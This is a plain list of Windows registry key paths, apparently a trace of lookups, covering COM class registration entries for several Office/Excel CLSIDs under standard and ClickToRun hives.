HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020820-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020820-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020821-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020821-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020830-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020830-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020832-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020832-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32\ServerExecutable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\AppID
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{00020833-0000-0000-C000-000000000046}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\LocalServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InProcServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{00020833-0000-0000-C000-000000000046}\InProcHandler32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\ActivateOnHostFlags
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{EABCECDB-CC1C-4A6F-B4E3-7F888A5ADFC8}\LocalServer32\(Default)
